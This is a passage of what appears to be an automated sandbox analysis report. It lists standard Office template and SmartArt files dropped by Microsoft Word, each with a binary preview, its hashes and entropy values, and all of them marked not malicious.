                            Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):11380
                            Entropy (8bit):7.891971054886943
                            Encrypted:false
                            SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                            MD5:C9F9364C659E2F0C626AC0D0BB519062
                            SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                            SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                            SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                            Malicious:false
                            Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):6024
                            Entropy (8bit):7.886254023824049
                            Encrypted:false
                            SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                            MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                            SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                            SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                            SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                            Malicious:false
                            Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):9191
                            Entropy (8bit):7.93263830735235
                            Encrypted:false
                            SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                            MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                            SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                            SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                            SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                            Malicious:false
                            Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):4326
                            Entropy (8bit):7.821066198539098
                            Encrypted:false
                            SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                            MD5:D32E93F7782B21785424AE2BEA62B387
                            SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                            SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                            SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                            Malicious:false
                            Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):7370
                            Entropy (8bit):7.9204386289679745
                            Encrypted:false
                            SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                            MD5:586CEBC1FAC6962F9E36388E5549FFE9
                            SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                            SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                            SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                            Malicious:false
                            Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):5596
                            Entropy (8bit):7.875182123405584
                            Encrypted:false
                            SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                            MD5:CDC1493350011DB9892100E94D5592FE
                            SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                            SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                            SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                            Malicious:false
                            Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):3683
                            Entropy (8bit):7.772039166640107
                            Encrypted:false
                            SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                            MD5:E8308DA3D46D0BC30857243E1B7D330D
                            SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                            SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                            SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                            Malicious:false
                            Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):4888
                            Entropy (8bit):7.8636569313247335
                            Encrypted:false
                            SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                            MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                            SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                            SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                            SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                            Malicious:false
                            Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):6448
                            Entropy (8bit):7.897260397307811
                            Encrypted:false
                            SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                            MD5:42A840DC06727E42D42C352703EC72AA
                            SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                            SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                            SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                            Malicious:false
                            Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):5630
                            Entropy (8bit):7.87271654296772
                            Encrypted:false
                            SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                            MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                            SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                            SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                            SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                            Malicious:false
                            Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):6193
                            Entropy (8bit):7.855499268199703
                            Encrypted:false
                            SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                            MD5:031C246FFE0E2B623BBBD231E414E0D2
                            SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                            SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                            SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                            Malicious:false
                            Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):3075
                            Entropy (8bit):7.716021191059687
                            Encrypted:false
                            SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                            MD5:67766FF48AF205B771B53AA2FA82B4F4
                            SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                            SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                            SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                            Malicious:false
                            Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):5151
                            Entropy (8bit):7.859615916913808
                            Encrypted:false
                            SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                            MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                            SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                            SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                            SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                            Malicious:false
                            Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):333258
                            Entropy (8bit):4.654450340871081
                            Encrypted:false
                            SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                            MD5:5632C4A81D2193986ACD29EADF1A2177
                            SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                            SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                            SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
